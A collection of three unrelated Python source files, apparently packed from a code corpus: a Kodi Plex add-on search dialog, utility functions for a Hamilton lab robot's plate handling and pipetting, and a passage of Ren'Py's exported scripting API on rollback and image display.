self.hubItemClicked(controlID)
def onFocus(self, controlID):
if 2099 < controlID < 2200:
self.setProperty('hub.focus', str(controlID - 2099))
def updateFromEdit(self):
self.updateQuery()
def updateQuery(self):
self.updateResults()
def updateResults(self):
self.updateResultsTimeout = time.time() + 1
if not self.resultsThread or not self.resultsThread.isAlive():
self.resultsThread = threading.Thread(target=self._updateResults, name='search.update')
self.resultsThread.start()
def _updateResults(self):
while time.time() < self.updateResultsTimeout and not util.MONITOR.waitForAbort(0.1):
pass
self._reallyUpdateResults()
def _reallyUpdateResults(self):
query = self.edit.getText()
if query:
with self.propertyContext('searching'):
hubs = plexapp.SERVERMANAGER.selectedServer.hubs(count=10, search_query=query, section=self.sectionID)
self.showHubs(hubs)
else:
self.clearHubs()
def sectionClicked(self, controlID):
section = self.SECTION_BUTTONS[controlID]
old = self.getProperty('search.section')
self.setProperty('search.section', section)
if old != section:
self.updateResults()
def letterClicked(self, controlID):
letter = self.LETTERS[controlID - 1001]
self.edit.append(letter)
self.updateQuery()
def deleteClicked(self):
self.edit.delete()
self.updateQuery()
def clearClicked(self):
self.edit.setText('')
self.updateQuery()
def hubItemClicked(self, hubControlID):
for controls in self.hubControls:
for control in controls.values():
if control.controlID == hubControlID:
break
else:
continue
break
else:
return
mli = control.getSelectedItem()
if not mli:
return
hubItem = mli.dataSource
if hubItem.TYPE == 'playlist' and not hubItem.exists(): # Workaround for server bug
util.messageDialog('No Access', 'Playlist not accessible by this user.')
util.DEBUG_LOG('Search: Playlist does not exist - probably wrong user')
return
self.doClose()
try:
command = opener.open(hubItem)
if not hubItem.exists():
control.removeManagedItem(mli)
self.processCommand(command)
finally:
if not self.exitCommand:
self.show()
else:
self.isActive = False
def createListItem(self, hubItem):
if hubItem.TYPE in ('Genre', 'Director', 'Role'):
if hubItem.TYPE == 'Genre':
thumb = (self.SECTION_TYPE_MAP.get(hubItem.librarySectionType) or {}).get('thumb', '')
mli = kodigui.ManagedListItem(hubItem.tag, hubItem.reasonTitle, thumbnailImage=thumb, data_source=hubItem)
mli.setProperty('thumb.fallback', thumb)
else:
mli = kodigui.ManagedListItem(
hubItem.tag, hubItem.reasonTitle, thumbnailImage=hubItem.get('thumb').asTranscodedImageURL(256, 256), data_source=hubItem
)
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/role.png')
else:
if hubItem.TYPE == 'playlist':
mli = kodigui.ManagedListItem(hubItem.tag, thumbnailImage=hubItem.get('composite').asTranscodedImageURL(256, 256), data_source=hubItem)
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/{0}.png'.format(hubItem.playlistType == 'audio' and 'music' or 'movie'))
elif hubItem.TYPE == 'photodirectory':
mli = kodigui.ManagedListItem(hubItem.title, thumbnailImage=hubItem.get('composite').asTranscodedImageURL(256, 256), data_source=hubItem)
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/photo.png')
else:
mli = kodigui.ManagedListItem(hubItem.title, thumbnailImage=hubItem.get('thumb').asTranscodedImageURL(256, 256), data_source=hubItem)
if hubItem.TYPE in ('movie', 'clip'):
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/movie.png')
elif hubItem.TYPE in ('artist', 'album', 'track'):
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/music.png')
elif hubItem.TYPE in ('show', 'season', 'episode'):
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/show.png')
elif hubItem.TYPE == 'photo':
mli.setProperty('thumb.fallback', 'script.plexodus/thumb_fallbacks/photo.png')
return mli
def showHubs(self, hubs):
self.clearHubs()
self.opaqueBackground(on=False)
allowed = None
if self.getProperty('search.section') == 'movie':
allowed = ('movie',)
elif self.getProperty('search.section') == 'show':
allowed = ('show', 'season', 'episode')
elif self.getProperty('search.section') == 'artist':
allowed = ('artist', 'album', 'track')
elif self.getProperty('search.section') == 'photo':
allowed = ('photo', 'photodirectory')
controlID = None
i = 0
for h in hubs:
if allowed and h.type not in allowed:
continue
if h.size.asInt() > 0:
self.opaqueBackground()
cid = self.showHub(h, i)
controlID = controlID or cid
i += 1
if controlID:
self.setProperty('no.results', '')
else:
self.setProperty('no.results', '1')
def showHub(self, hub, idx):
util.DEBUG_LOG('Showing search hub: {0} at {1}'.format(hub.type, idx))
info = self.HUBMAP.get(hub.type)
if not info:
util.DEBUG_LOG('Unhandled hub type: {0}'.format(hub.type))
return
itemListControl = self.hubControls[idx][info['type']]
if itemListControl is None:
util.DEBUG_LOG('No control defined')
return
self.setProperty('hub.{0}'.format(itemListControl.controlID), hub.title)
items = []
for hubItem in hub.items:
mli = self.createListItem(hubItem)
items.append(mli)
itemListControl.reset()
itemListControl.addItems(items)
return itemListControl.controlID
def clearHubs(self):
self.opaqueBackground(on=False)
self.setProperty('no.results', '')
for controls in self.hubControls:
for control in controls.values():
if control:
control.reset()
self.setProperty('hub.focus', '')
def opaqueBackground(self, on=True):
self.parentWindow.setProperty('search.dialog.hasresults', on and '1' or '')
def wait(self):
while self.isActive and not util.MONITOR.waitForAbort(0.1):
pass
def dialog(parent_window, section_id=None):
parent_window.setProperty('search.dialog.hasresults', '')
with parent_window.propertyContext('search.dialog'):
try:
w = SearchDialog.open(parent_window=parent_window, section_id=section_id)
w.wait()
command = w.exitCommand or ''
del w
return command
finally:
parent_window.setProperty('search.dialog.hasresults', '')
|
pace_util.py
|
#!python3
import sys, os, time, logging, importlib
from threading import Thread
this_file_dir = os.path.dirname(__file__)
methods_dir = os.path.abspath(os.path.join(this_file_dir, '..', '..', '..'))
dropbox_dir = os.path.dirname(methods_dir)
user_dir = os.path.dirname(dropbox_dir)
global_log_dir = os.path.join(dropbox_dir, 'Monitoring', 'log')
pyham_pkg_path = os.path.join(methods_dir, 'perma_oem', 'pyhamilton')
reader_mod_path = os.path.join(methods_dir, 'perma_plate_reader', 'platereader')
pump_pkg_path = os.path.join(methods_dir, 'perma_pump', 'auxpump')
shaker_pkg_path = os.path.join(methods_dir, 'perma_shaker', 'auxshaker')
LAYFILE = os.path.join(this_file_dir, 'assets', 'deck.lay')
for imp_path in (pyham_pkg_path, reader_mod_path, pump_pkg_path, shaker_pkg_path):
pkgname = os.path.basename(imp_path)
try:
imported_mod = importlib.import_module(pkgname)
except ModuleNotFoundError:
if imp_path not in sys.path:
sys.path.append(imp_path)
imported_mod = importlib.import_module(pkgname)
print('USING ' + ('SITE-PACKAGES ' if 'site-packages' in os.path.abspath(imported_mod.__file__) else 'LOCAL ') + pkgname)
import pyhamilton
from pyhamilton import (HamiltonInterface, LayoutManager, ResourceType, Plate24, Plate96, Tip96,
INITIALIZE, PICKUP, EJECT, ASPIRATE, DISPENSE, ISWAP_GET, ISWAP_PLACE, HEPA,
WASH96_EMPTY, PICKUP96, EJECT96, ASPIRATE96, DISPENSE96,
oemerr, PositionError)
from platereader.clariostar import ClarioStar, PlateData
from auxpump.pace import OffDeckCulturePumps, LBPumps
from auxshaker.bigbear import Shaker
import send_email
def resource_list_with_prefix(layout_manager, prefix, res_class, num_ress, order_key=None, reverse=False):
def name_from_line(line):
field = LayoutManager.layline_objid(line)
if field:
return field
return LayoutManager.layline_first_field(line)
layline_test = lambda line: LayoutManager.field_starts_with(name_from_line(line), prefix)
res_type = ResourceType(res_class, layline_test, name_from_line)
res_list = [layout_manager.assign_unused_resource(res_type, order_key=order_key, reverse=reverse) for _ in range(num_ress)]
return res_list
def labware_pos_str(labware, idx):
return labware.layout_name() + ', ' + labware.position_id(idx)
def compound_pos_str(pos_tuples):
present_pos_tups = [pt for pt in pos_tuples if pt is not None]
return ';'.join((labware_pos_str(labware, idx) for labware, idx in present_pos_tups))
def compound_pos_str_96(labware96):
return ';'.join((labware_pos_str(labware96, idx) for idx in range(96)))
def initialize(ham, async=False):
logging.info('initialize: ' + ('a' if async else '') + 'synchronously initialize the robot')
cmd = ham.send_command(INITIALIZE)
if not async:
ham.wait_on_response(cmd, raise_first_exception=True)
return cmd
def hepa_on(ham, speed=15, async=False, **more_options):
logging.info('hepa_on: turn on HEPA filter at ' + str(speed) + '% capacity' +
('' if not more_options else ' with extra options ' + str(more_options)))
cmd = ham.send_command(HEPA, fanSpeed=speed, **more_options)
if not async:
ham.wait_on_response(cmd, raise_first_exception=True)
return cmd
def wash_empty_refill(ham, async=False, **more_options):
logging.info('wash_empty_refill: empty the washer' +
('' if not more_options else ' with extra options ' + str(more_options)))
cmd = ham.send_command(WASH96_EMPTY, **more_options)
if not async:
ham.wait_on_response(cmd, raise_first_exception=True)
return cmd
def move_plate(ham, source_plate, target_plate, try_inversions=None):
logging.info('move_plate: Moving plate ' + source_plate.layout_name() + ' to ' + target_plate.layout_name())
src_pos = labware_pos_str(source_plate, 0)
trgt_pos = labware_pos_str(target_plate, 0)
if try_inversions is None:
try_inversions = (0, 1)
for inv in try_inversions:
cid = ham.send_command(ISWAP_GET, plateLabwarePositions=src_pos, gripHeight=6, inverseGrip=inv)
try:
ham.wait_on_response(cid, raise_first_exception=True, timeout=120)
break
except PositionError:
pass
else:
raise IOError
cid = ham.send_command(ISWAP_PLACE, plateLabwarePositions=trgt_pos)
try:
ham.wait_on_response(cid, raise_first_exception=True, timeout=120)
except PositionError:
raise IOError
def lagoon_pos_for_lagoon(lagoon_idx):
return lagoon_plate, lagoon_idx
def clean_tip_pos_for_lagoon(lagoon_idx):
return clean_tip_box, lagoon_idx
def dirty_tip_pos_for_lagoon(lagoon_idx):
return dirty_tip_boxes[lagoon_idx//96], lagoon_idx%96
def offset_equal_spaced_idxs(start_idx, increment):
# a generator that will be used for reader positions
idx = start_idx
while True:
yield idx
idx += increment
def read_plate(ham_int, reader_int, reader_site, plate, protocol_names, plate_id=None, async_task=None, plate_destination=None):
logging.info('read_plate: Running plate protocols ' + ', '.join(protocol_names) +
' on plate ' + plate.layout_name() + ('' if plate_id is None else ' with id ' + plate_id))
reader_int.plate_out(block=True)
move_plate(ham_int, plate, reader_site)
if async_task:
t = run_async(async_task)
plate_datas = reader_int.run_protocols(protocol_names, plate_id_1=plate_id)
reader_int.plate_out(block=True)
if async_task:
t.join()
if plate_destination is None:
plate_destination = plate
move_plate(ham_int, reader_site, plate_destination)
return plate_datas
def channel_var(pos_tuples):
ch_var = ['0']*16
for i, pos_tup in enumerate(pos_tuples):
if pos_tup is not None:
ch_var[i] = '1'
return ''.join(ch_var)
def tip_pick_up(ham_int, pos_tuples, **more_options):
logging.info('tip_pick_up: Pick up tips at ' + '; '.join((labware_pos_str(*pt) if pt else '(skip)' for pt in pos_tuples)) +
('' if not more_options else ' with extra options ' + str(more_options)))
num_channels = len(pos_tuples)
if num_channels > 8:
raise ValueError('Can only pick up 8 tips at a time')
ch_patt = channel_var(pos_tuples)
labware_poss = compound_pos_str(pos_tuples)
ham_int.wait_on_response(ham_int.send_command(PICKUP,
labwarePositions=labware_poss,
channelVariable=ch_patt,
**more_options), raise_first_exception=True)
def tip_eject(ham_int, pos_tuples=None, **more_options):
if pos_tuples is None:
logging.info('tip_eject: Eject tips to default waste' + ('' if not more_options else ' with extra options ' + str(more_options)))
more_options['useDefaultWaste'] = 1
dummy = Tip96('')
pos_tuples = [(dummy, 0)] * 8
else:
logging.info('tip_eject: Eject tips to ' + '; '.join((labware_pos_str(*pt) if pt else '(skip)' for pt in pos_tuples)) +
('' if not more_options else ' with extra options ' + str(more_options)))
num_channels = len(pos_tuples)
if num_channels > 8:
raise ValueError('Can only eject up to 8 tips')
ch_patt = channel_var(pos_tuples)
labware_poss = compound_pos_str(pos_tuples)
ham_int.wait_on_response(ham_int.send_command(EJECT,
labwarePositions=labware_poss,
channelVariable=ch_patt,
**more_options), raise_first_exception=True)
default_liq_class = 'HighVolumeFilter_Water_DispenseJet_Empty_with_transport_vol'
def assert_parallel_nones(list1, list2):
if not (len(list1) == len(list2) and all([(i1 is None) == (i2 is None) for i1, i2 in zip(list1, list2)])):
raise ValueError('Lists must have parallel None entries')
def aspirate(ham_int, pos_tuples, vols, **more_options):
assert_parallel_nones(pos_tuples, vols)
logging.info('aspirate: Aspirate volumes ' + str(vols) + ' from positions [' +
'; '.join((labware_pos_str(*pt) if pt else '(skip)' for pt in pos_tuples)) +
(']' if not more_options else '] with extra options ' + str(more_options)))
if len(pos_tuples) > 8:
raise ValueError('Can only aspirate with 8 channels at a time')
if 'liquidClass' not in more_options:
more_options.update({'liquidClass':default_liq_class})
ham_int.wait_on_response(ham_int.send_command(ASPIRATE,
channelVariable=channel_var(pos_tuples),
labwarePositions=compound_pos_str(pos_tuples),
volumes=[v for v in vols if v is not None],
**more_options), raise_first_exception=True)
def dispense(ham_int, pos_tuples, vols, **more_options):
assert_parallel_nones(pos_tuples, vols)
logging.info('dispense: Dispense volumes ' + str(vols) + ' into positions [' +
'; '.join((labware_pos_str(*pt) if pt else '(skip)' for pt in pos_tuples)) +
(']' if not more_options else '] with extra options ' + str(more_options)))
if len(pos_tuples) > 8:
raise ValueError('Can only aspirate with 8 channels at a time')
if 'liquidClass' not in more_options:
more_options.update({'liquidClass':default_liq_class})
ham_int.wait_on_response(ham_int.send_command(DISPENSE,
channelVariable=channel_var(pos_tuples),
labwarePositions=compound_pos_str(pos_tuples),
volumes=[v for v in vols if v is not None],
**more_options), raise_first_exception=True)
def tip_pick_up_96(ham_int, tip96, **more_options):
logging.info('tip_pick_up_96: Pick up tips at ' + tip96.layout_name() +
('' if not more_options else ' with extra options ' + str(more_options)))
labware_poss = compound_pos_str_96(tip96)
ham_int.wait_on_response(ham_int.send_command(PICKUP96,
labwarePositions=labware_poss,
**more_options), raise_first_exception=True)
def tip_eject_96(ham_int, tip96=None, **more_options):
logging.info('tip_eject_96: Eject tips to ' + (tip96.layout_name() if tip96 else 'default waste') +
('' if not more_options else ' with extra options ' + str(more_options)))
if tip96 is None:
labware_poss = ''
more_options.update({'tipEjectToKnownPosition':2}) # 2 is default waste
else:
labware_poss = compound_pos_str_96(tip96)
ham_int.wait_on_response(ham_int.send_command(EJECT96,
labwarePositions=labware_poss,
**more_options), raise_first_exception=True)
def aspirate_96(ham_int, plate96, vol, **more_options):
logging.info('aspirate_96: Aspirate volume ' + str(vol) + ' from ' + plate96.layout_name() +
('' if not more_options else ' with extra options ' + str(more_options)))
if 'liquidClass' not in more_options:
more_options.update({'liquidClass':default_liq_class})
ham_int.wait_on_response(ham_int.send_command(ASPIRATE96,
labwarePositions=compound_pos_str_96(plate96),
aspirateVolume=vol,
**more_options), raise_first_exception=True)
def dispense_96(ham_int, plate96, vol, **more_options):
logging.info('dispense_96: Dispense volume ' + str(vol) + ' into ' + plate96.layout_name() +
('' if not more_options else ' with extra options ' + str(more_options)))
if 'liquidClass' not in more_options:
more_options.update({'liquidClass':default_liq_class})
ham_int.wait_on_response(ham_int.send_command(DISPENSE96,
labwarePositions=compound_pos_str_96(plate96),
dispenseVolume=vol,
**more_options), raise_first_exception=True)
def add_robot_level_log(logger_name=None):
logger = logging.getLogger(logger_name) # root logger if None
logger.setLevel(logging.DEBUG)
with open(os.path.join(user_dir, '.roboid')) as roboid_f:
robot_id = roboid_f.read()
robot_log_dir = os.path.join(global_log_dir, robot_id, robot_id + '.log')
hdlr = logging.FileHandler(robot_log_dir)
formatter = logging.Formatter('[%(asctime)s] %(name)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
class StderrLogger:
def __init__(self, level):
self.level = level
self.stderr = sys.stderr
def write(self, message):
self.stderr.write(message)
if message.strip():
self.level(message.replace('\n', ''))
def add_stderr_logging(logger_name=None):
logger = logging.getLogger(logger_name) # root logger if None
sys.stderr = StderrLogger(logger.error)
fileflag_dir = os.path.abspath('.')
while fileflag_dir and os.path.basename(fileflag_dir).lower() != 'std-96-pace':
fileflag_dir = os.path.dirname(fileflag_dir)
fileflag_dir = os.path.join(fileflag_dir, 'method_local', 'flags')
def set_fileflag(flag_name):
assert_fileflag_harmless(flag_name)
flag_loc = os.path.join(fileflag_dir, flag_name)
if not os.path.isdir(fileflag_dir):
if os.path.exists(fileflag_dir):
raise IOError('method-local non-directory item named "flags" already exists')
os.mkdir(fileflag_dir)
if not fileflag(flag_name):
with open(flag_loc, 'w+') as f:
f.write('')
def clear_fileflag(flag_name):
assert_fileflag_harmless(flag_name)
flag_loc = os.path.join(fileflag_dir, flag_name)
try:
os.remove(flag_loc)
except FileNotFoundError:
pass
def fileflag(flag_name):
flag_loc = os.path.join(fileflag_dir, flag_name)
return os.path.isfile(flag_loc)
def assert_fileflag_harmless(flag_name):
if not fileflag(flag_name):
return
flag_loc = os.path.join(fileflag_dir, flag_name)
if os.path.getsize(flag_loc) != 0:
raise IOError('Fileflag refers to a non-empty file!')
def run_async(funcs):
def go():
try:
iter(funcs)
except TypeError:
funcs()
return
for func in funcs:
func()
func_thread = Thread(target=go, daemon=True)
func_thread.start()
return func_thread
def yield_in_chunks(sliceable, n):
sliceable = list(sliceable)
start_pos = 0
end_pos = n
while start_pos < len(sliceable):
yield sliceable[start_pos:end_pos]
start_pos, end_pos = end_pos, end_pos + n
def log_banner(banner_text):
l = len(banner_text)
margin = 5
width = l + 2*margin + 2
return ['#'*width,
'#' + ' '*(width - 2) + '#',
'#' + ' '*margin + banner_text + ' '*margin + '#',
'#' + ' '*(width - 2) + '#',
'#'*width]
|
exports.py
|
# Copyright 2004-2019 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains functions that are exported to the script namespace.
# Functions defined in this file can be updated by the user to change
# their behavior, while functions imported in are probably best left
# alone as part of the api.
from __future__ import print_function
# Remember the real file.
_file = file
import re
import renpy.display
import renpy.audio
from renpy.pyanalysis import const, pure, not_const
def renpy_pure(fn):
"""
Marks renpy.`fn` as a pure function.
"""
name = fn
if not isinstance(name, basestring):
name = fn.__name__
pure("renpy." + name)
return fn
import pygame_sdl2
from renpy.text.extras import ParameterizedText, filter_text_tags
from renpy.text.font import register_sfont, register_mudgefont, register_bmfont
from renpy.text.text import language_tailor, BASELINE
from renpy.display.behavior import Keymap
from renpy.display.behavior import run, run as run_action, run_unhovered, run_periodic
from renpy.display.behavior import map_event, queue_event, clear_keymap_cache
from renpy.display.behavior import is_selected, is_sensitive
from renpy.display.minigame import Minigame
from renpy.display.screen import define_screen, show_screen, hide_screen, use_screen, current_screen
from renpy.display.screen import has_screen, get_screen, get_widget, ScreenProfile as profile_screen
from renpy.display.screen import get_widget_properties
from renpy.display.focus import focus_coordinates
from renpy.display.predict import screen as predict_screen
from renpy.display.image import image_exists, image_exists as has_image, list_images
from renpy.display.image import get_available_image_tags, get_available_image_attributes, check_image_attributes, get_ordered_image_attributes
from renpy.display.image import get_registered_image
from renpy.display.im import load_surface, load_image
from renpy.curry import curry, partial
from renpy.display.video import movie_start_fullscreen, movie_start_displayable, movie_stop
from renpy.loadsave import load, save, list_saved_games, can_load, rename_save, copy_save, unlink_save, scan_saved_game
from renpy.loadsave import list_slots, newest_slot, slot_mtime, slot_json, slot_screenshot, force_autosave
from renpy.python import py_eval as eval
from renpy.python import rng as random
from renpy.atl import atl_warper
from renpy.easy import predict, displayable, split_properties
from renpy.parser import unelide_filename, get_parse_errors
from renpy.translation import change_language, known_languages
from renpy.translation.generation import generic_filter as transform_text
from renpy.persistent import register_persistent
from renpy.character import show_display_say, predict_show_display_say, display_say
import renpy.audio.sound as sound
import renpy.audio.music as music
from renpy.statements import register as register_statement
from renpy.text.extras import check_text_tags
from renpy.memory import profile_memory, diff_memory, profile_rollback
from renpy.text.textsupport import TAG as TEXT_TAG, TEXT as TEXT_TEXT, PARAGRAPH as TEXT_PARAGRAPH, DISPLAYABLE as TEXT_DISPLAYABLE
from renpy.execution import not_infinite_loop
from renpy.sl2.slparser import CustomParser as register_sl_statement, register_sl_displayable
from renpy.ast import eval_who
from renpy.loader import add_python_directory
from renpy.lint import try_compile, try_eval
renpy_pure("ParameterizedText")
renpy_pure("Keymap")
renpy_pure("has_screen")
renpy_pure("image_exists")
renpy_pure("curry")
renpy_pure("partial")
renpy_pure("unelide_filename")
renpy_pure("known_languages")
renpy_pure("check_text_tags")
renpy_pure("filter_text_tags")
import time
import sys
import threading
import fnmatch
def public_api():
"""
:undocumented:
This does nothing, except to make warnings about unused imports go away.
"""
ParameterizedText, filter_text_tags
register_sfont, register_mudgefont, register_bmfont
Keymap
run, run_action, run_unhovered, run_periodic, map_event
Minigame
curry, partial
play
movie_start_fullscreen, movie_start_displayable, movie_stop
load, save, list_saved_games, can_load, rename_save, copy_save, unlink_save, scan_saved_game
list_slots, newest_slot, slot_mtime, slot_json, slot_screenshot, force_autosave
eval
random
atl_warper
show_display_say, predict_show_display_say, display_say
sound
music
time
define_screen, show_screen, hide_screen, use_screen, has_screen
current_screen, get_screen, get_widget, profile_screen, get_widget_properties
focus_coordinates
predict, predict_screen
displayable, split_properties
unelide_filename, get_parse_errors
change_language, known_languages
transform_text
language_tailor
register_persistent
register_statement
check_text_tags
map_event, queue_event, clear_keymap_cache
const, pure, not_const
image_exists, has_image, list_images
get_available_image_tags, get_available_image_attributes, check_image_attributes, get_ordered_image_attributes
get_registered_image
load_image, load_surface
profile_memory, diff_memory, profile_rollback
TEXT_TAG
TEXT_TEXT
TEXT_PARAGRAPH
TEXT_DISPLAYABLE
not_infinite_loop
register_sl_statement, register_sl_displayable
eval_who
is_selected, is_sensitive
add_python_directory
try_compile, try_eval
del public_api
def roll_forward_info():
"""
:doc: rollback
When in rollback, returns the data that was supplied to :func:`renpy.checkpoint`
the last time this statement executed. Outside of rollback, returns None.
"""
if not renpy.game.context().rollback:
return None
return renpy.game.log.forward_info()
def roll_forward_core(value=None):
"""
:undocumented:
To cause a roll_forward to occur, return the value of this function
from an event handler.
"""
if value is None:
value = roll_forward_info()
if value is None:
return
renpy.game.interface.suppress_transition = True
renpy.game.after_rollback = True
renpy.game.log.rolled_forward = True
return value
def in_rollback():
"""
:doc: rollback
Returns true if the game has been rolled back.
"""
return renpy.game.log.in_rollback() or renpy.game.after_rollback
def can_rollback():
"""
:doc: rollback
Returns true if we can rollback.
"""
if not renpy.config.rollback_enabled:
return False
return renpy.game.log.can_rollback()
def in_fixed_rollback():
"""
:doc: blockrollback
Returns true if rollback is currently occurring and the current
context is before an executed renpy.fix_rollback() statement.
"""
return renpy.game.log.in_fixed_rollback()
def checkpoint(data=None, keep_rollback=None):
"""
:doc: rollback
:args: (data=None)
Makes the current statement a checkpoint that the user can rollback to. Once
this function has been called, there should be no more interaction with the
user in the current statement.
This will also clear the current screenshot used by saved games.
`data`
This data is returned by :func:`renpy.roll_forward_info` when the
game is being rolled back.
"""
if keep_rollback is None:
keep_rollback = renpy.config.keep_rollback_data
renpy.game.log.checkpoint(data, keep_rollback=keep_rollback, hard=renpy.store._rollback)
if renpy.store._rollback and renpy.config.auto_clear_screenshot:
renpy.game.interface.clear_screenshot = True
def block_rollback(purge=False):
"""
:doc: blockrollback
:args: ()
Prevents the game from rolling back to before the current
statement.
"""
renpy.game.log.block(purge=purge)
def suspend_rollback(flag):
"""
:doc: rollback
:args: (flag)
Rollback will skip sections of the game where rollback has been
suspended.
`flag`:
When `flag` is true, rollback is suspended. When false,
rollback is resumed.
"""
renpy.game.log.suspend_checkpointing(flag)
def fix_rollback():
"""
:doc: blockrollback
Prevents the user from changing decisions made before the current
statement.
"""
renpy.game.log.fix_rollback()
def retain_after_load():
"""
:doc: retain_after_load
Causes data modified between the current statement and the statement
containing the next checkpoint to be retained when a load occurs.
"""
renpy.game.log.retain_after_load()
scene_lists = renpy.display.core.scene_lists
def count_displayables_in_layer(layer):
"""
Returns how many displayables are in the supplied layer.
"""
sls = scene_lists()
return len(sls.layers[layer])
def image(name, d):
"""
:doc: se_images
Defines an image. This function is the Python equivalent of the
image statement.
`name`
The name of the image to display, a string.
`d`
The displayable to associate with that image name.
This function may only be run from inside an init block. It is an
error to run this function once the game has started.
"""
if d is None:
raise Exception("Images may not be declared to be None.")
if not renpy.game.context().init_phase:
raise Exception("Images may only be declared inside init blocks.")
if not isinstance(name, tuple):
name = tuple(name.split())
d = renpy.easy.displayable(d)
renpy.display.image.register_image(name, d)
def copy_images(old, new):
"""
:doc: image_func
Copies images beginning with one prefix to images beginning with
another. For example::
renpy.copy_images("eileen", "eileen2")
will create an image beginning with "eileen2" for every image beginning
with "eileen". If "eileen happy" exists, "eileen2 happy" will be
created.
`old`
A space-separated string giving the components of the old image
name.
`new`
A space-separated string giving the components of the new image
name.
"""
if not isinstance(old, tuple):
old = tuple(old.split())
if not isinstance(new, tuple):
new = tuple(new.split())
lenold = len(old)
for k, v in renpy.display.image.images.items():
if len(k) < lenold:
continue
if k[:lenold] == old:
renpy.display.image.register_image(new + k[lenold:], v)
def default_layer(layer, tag, expression=False):
"""
:undocumented:
If layer is not None, returns it. Otherwise, interprets `tag` as a name
or tag, then looks up what the default layer for that tag is, and returns
the result.
"""
if layer is not None:
return layer
if expression:
return 'master'
if isinstance(tag, tuple):
tag = tag[0]
elif " " in tag:
tag = tag.split()[0]
return renpy.config.tag_layer.get(tag, renpy.config.default_tag_layer)
def can_show(name, layer=None, tag=None):
"""
:doc: image_func
Determines if `name` can be used to show an image. This interprets `name`
as a tag and attributes. This is combined with the attributes of the
currently-showing image with `tag` on `layer` to try to determine a unique image
to show. If a unique image can be show, returns the name of that image as
a tuple. Otherwise, returns None.
`tag`
The image tag to get attributes from. If not given, defaults to the first
component of `name`.
`layer`
The layer to check. If None, uses the default layer for `tag`.
"""
if not isinstance(name, tuple):
name = tuple(name.split())
if tag is None:
tag = name[0]
layer = default_layer(layer, None)
try:
return renpy.game.context().images.apply_attributes(layer, tag, name)
except:
return None
def showing(name, layer='master'):
"""
:doc: image_func
Returns true if an image with the same tag as `name` is showing on
`layer`.
`image`
May be a string giving the image name or a tuple giving each
component of the image name. It may also be a string giving
only the image tag.
`layer`
The layer to check. If None, uses the default layer for `tag`.
"""
if not isinstance(name, tuple):
name = tuple(name.split())
layer = default_layer(layer, name)
return renpy.game.context().images.showing(layer, name)
def get_showing_tags(layer='master', sort=False):
"""
:doc: image_func
Returns the set of image tags that are currently being shown on `layer`. If
sort is true, returns a list of the tags from back to front.
"""
if sort:
return scene_lists().get_sorted_tags(layer)
return renpy.game.context().images.get_showing_tags(layer)
def get_hidden_tags(layer='master'):
"""
:doc: image_func
Returns the set of image tags on `layer` that are currently hidden, but
still have attribute information associated with them.
"""
return renpy.game.context().images.get_hidden_tags(layer)
def get_attributes(tag, layer=None, if_hidden=None):
"""
:doc: image_func
Return a tuple giving the image attributes for the image `tag`. If
the image tag has not had any attributes associated since the last
time it was hidden, returns `if_hidden`.
`layer`
The layer to check. If None, uses the default layer for `tag`.
"""
layer = default_layer(layer, tag)
return renpy.game.context().images.get_attributes(layer, tag, if_hidden)
def predict_show(name, layer=None, what=None, tag=None, at_list=[ ]):
"""
:undocumented:
Predicts a scene or show statement.
`name`
The name of the image to show, a string.
`layer`
The layer the image is being shown on.
`what`
What is being show - if given, overrides `name`.
`tag`
The tag of the thing being shown.
`at_list`
A list of transforms to apply to the displayable.
"""
key = tag or name[0]
layer = default_layer(key, layer)
if what is None:
what = name
elif isinstance(what, basestring):
what = tuple(what.split())
if isinstance(what, renpy.display.core.Displayable):
base = img = what
else:
if renpy.config.image_attributes:
new_what = renpy.game.context().images.apply_attributes(layer, key, name)
if new_what is not None:
what = new_what
name = (key,) + new_what[1:]
base = img = renpy.display.image.ImageReference(what, style='image_placement')
if not base.find_target():
return
for i in at_list:
if isinstance(i, renpy.display.motion.Transform):
img = i(child=img)
else:
img = i(img)
img._unique()
renpy.game.context().images.predict_show(layer, name, True)
renpy.display.predict.displayable(img)
def show(name, at_list=[ ], layer=None, what=None, zorder=None, tag=None, behind=[ ], atl=None, transient=False, munge_name=True):
"""
:doc: se_images
:args: (name, at_list=[ ], layer='master', what=None, zorder=0, tag=None, behind=[ ])
Shows an image on a layer. This is the programmatic equivalent of the show
statement.
`name`
The name of the image to show, a string.
`at_list`
A list of transforms that are applied to the image.
The equivalent of the ``at`` property.
`layer`
A string, giving the name of the layer on which the image will be shown.
The equivalent of the ``onlayer`` property. If None, uses the default
layer associated with the tag.
`what`
If not None, this is a displayable that will be shown in lieu of
looking on the image. (This is the equivalent of the show expression
statement.) When a `what` parameter is given, `name` can be used to
associate a tag with the image.
`zorder`
An integer, the equivalent of the ``zorder`` property. If None, the
zorder is preserved if it exists, and is otherwise set to 0.
`tag`
A string, used to specify the image tag of the shown image. The
equivalent of the ``as`` property.
`behind`
A list of strings, giving image tags that this image is shown behind.
The equivalent of the ``behind`` property.
"""
default_transform = renpy.config.default_transform
if renpy.game.context().init_phase:
raise Exception("Show may not run while in init phase.")
if not isinstance(name, tuple):
name = tuple(name.split())
